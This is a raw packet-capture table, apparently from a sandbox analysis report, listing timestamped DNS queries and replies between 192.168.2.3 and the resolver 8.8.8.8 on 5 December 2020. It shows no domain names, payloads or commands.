                                                                                                                                                  Dec 5, 2020 08:43:49.546184063 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.547491074 CET6163353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.582858086 CET53616338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.651437044 CET5594953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.678586006 CET53559498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.899038076 CET53532798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.931978941 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.932180882 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.933799028 CET5760153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.967845917 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.969422102 CET53576018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.971388102 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.973582029 CET4934253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.998538971 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.009165049 CET53493428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.183084011 CET5625353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.218580008 CET53562538.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.730550051 CET4966753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.766110897 CET53496678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.276849031 CET5543953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.312589884 CET53554398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.823340893 CET5706953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.858886957 CET53570698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.408591986 CET5765953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET53576598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.955682993 CET5471753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET53547178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.624989986 CET6397553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.625580072 CET5663953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET53566398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.661736012 CET53639758.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:57.236421108 CET5185653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET53518568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.803669930 CET5654653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.804709911 CET6215253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET53565468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET53621528.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.846127987 CET5347053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.857948065 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.864092112 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.870414019 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.875919104 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET53534708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.884202003 CET5644653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.885776997 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET53564468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921621084 CET5963153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET53596318.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.448873997 CET5551553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET53555158.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.980581999 CET6454753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET53645478.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.103238106 CET5175953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET53517598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.257143021 CET5920753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.284282923 CET53592078.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.497203112 CET5426953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET53542698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.591161966 CET5485653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.618272066 CET53548568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.016016006 CET6414053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET53641408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.558756113 CET6227153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.585874081 CET53622718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.765913963 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.769349098 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.771750927 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.804965973 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.805136919 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.806685925 CET5740453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.807198048 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.807689905 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.810213089 CET6299753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.840622902 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.843271971 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.845679045 CET53629978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.847259045 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.848738909 CET5771253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.882863045 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.884290934 CET53577128.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.885165930 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.886617899 CET6006553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.922142029 CET53600658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.922636032 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.922816038 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.923988104 CET5506853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.958138943 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.959275007 CET53550688.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.959923029 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.961081028 CET6470053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.995296001 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.998722076 CET53647008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.075781107 CET6199853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.102962017 CET53619988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.258291006 CET53574048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.258651018 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.260009050 CET5372453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.287118912 CET53537248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.294251919 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.296370983 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.297508955 CET5232853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.323529005 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.332926989 CET53523288.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.333282948 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.334471941 CET5805153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.360413074 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.370055914 CET53580518.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.371311903 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.373500109 CET6413053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.408910990 CET53641308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.409029961 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.606443882 CET5049153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.633642912 CET53504918.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:03.137140989 CET5300453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:03.172971010 CET53530048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:03.686932087 CET5252953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:03.722223043 CET53525298.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:04.230811119 CET5365653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:04.258011103 CET53536568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:04.763760090 CET6272453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:04.799576044 CET53627248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:05.314198017 CET5605953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:05.341470003 CET53560598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:05.840318918 CET6306053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:05.875819921 CET53630608.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:06.373202085 CET5149853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:06.408987999 CET53514988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:06.904190063 CET5994353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:06.931457043 CET53599438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:07.454602003 CET5011853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:07.490495920 CET53501188.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:07.996587992 CET5835753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:08.032026052 CET53583578.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:08.543495893 CET5580453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:08.579233885 CET53558048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:09.090739965 CET5807953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:09.117932081 CET53580798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:09.623686075 CET5208053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:09.650924921 CET53520808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:10.154020071 CET5523853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:10.189573050 CET53552388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:10.701011896 CET4928953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:10.736742973 CET53492898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:11.232388973 CET6103453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:11.259766102 CET53610348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:11.779169083 CET5196453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:11.814625025 CET53519648.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:12.556914091 CET5824153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:12.592415094 CET53582418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:13.165429115 CET5957153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:13.201133013 CET53595718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:14.356935978 CET5170853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:14.384213924 CET53517088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:14.888703108 CET6070953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:14.915936947 CET53607098.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:15.421914101 CET6364353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:15.457453966 CET53636438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:15.970869064 CET6282353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:16.006361961 CET53628238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:16.517447948 CET6375053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:16.544770956 CET53637508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:17.044955015 CET6195953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:17.072150946 CET53619598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:17.575695992 CET6355453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:17.611612082 CET53635548.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:18.123766899 CET5772353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:18.151106119 CET53577238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:18.669492006 CET5866353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:18.707458019 CET53586638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:19.217264891 CET5098053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:19.244326115 CET53509808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:19.749089956 CET5006753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:19.776283979 CET53500678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:20.296304941 CET5299253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:20.331681013 CET53529928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:20.842305899 CET5512953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:20.869514942 CET53551298.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:21.357323885 CET6095953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:21.384578943 CET53609598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:21.890527010 CET5831953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:21.917773962 CET53583198.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:22.444001913 CET6478553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:22.479697943 CET53647858.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:22.983156919 CET5020853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:23.010308027 CET53502088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:23.502736092 CET6247753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:23.538587093 CET53624778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:24.046238899 CET5446753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:24.081728935 CET53544678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:24.591864109 CET6054853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:24.627392054 CET53605488.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:25.124499083 CET5962353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:25.151590109 CET53596238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:25.670666933 CET5168953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:25.699100018 CET53516898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.218074083 CET6480653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.253832102 CET53648068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.543859005 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.579519033 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.749294996 CET5619553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.776443005 CET53561958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.993132114 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.028892040 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.264238119 CET5054353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.299865007 CET53505438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.561621904 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.597405910 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.796911001 CET5644553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.832472086 CET53564458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.997512102 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.033262014 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.345057964 CET5670953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.374311924 CET53567098.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.575939894 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.613672018 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.874937057 CET5124853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.910343885 CET53512488.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.997826099 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.025007963 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:29.404752970 CET4967953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.431976080 CET53496798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:29.942001104 CET5026353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.969094038 CET53502638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:30.538630962 CET4921553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:30.574170113 CET53492158.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:30.584671974 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:30.619970083 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.013973951 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.051604033 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.092473030 CET6437253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.119700909 CET53643728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.612140894 CET5001653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.639300108 CET53500168.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:32.162920952 CET6132553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:32.198580027 CET53613258.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:32.686481953 CET4916053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:32.722119093 CET53491608.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET5126553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.269009113 CET53512658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET5200653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.808217049 CET53520068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET5869753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.331381083 CET53586978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.596105099 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.631959915 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET5153053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.869741917 CET53515308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.029475927 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.067337036 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET5098953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.387875080 CET53509898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET5332353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.940874100 CET53533238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET5903453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:36.487648964 CET53590348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET5310653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.040384054 CET53531068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET6213253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.574875116 CET53621328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET5448953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.089510918 CET53544898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET6439053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.604686975 CET53643908.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET5836953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.136360884 CET53583698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET6420353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.676059008 CET53642038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET4923253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.230995893 CET53492328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET5255853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.761543989 CET53525588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET5355553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.285490036 CET53535558.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET5008353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.809024096 CET53500838.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET4980453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.343743086 CET53498048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET6296353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.879030943 CET53629638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET6369553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.413537025 CET53636958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET6429653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.942786932 CET53642968.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET6084453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:44.467500925 CET53608448.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET6391753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.011172056 CET53639178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET5185153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.527698040 CET53518518.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET4989853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.096565962 CET53498988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET4963253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.624881983 CET53496328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET6536153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.186608076 CET53653618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET5020653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.755641937 CET53502068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET4961353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:48.279632092 CET53496138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET6303253192.168.2.38.8.8.8
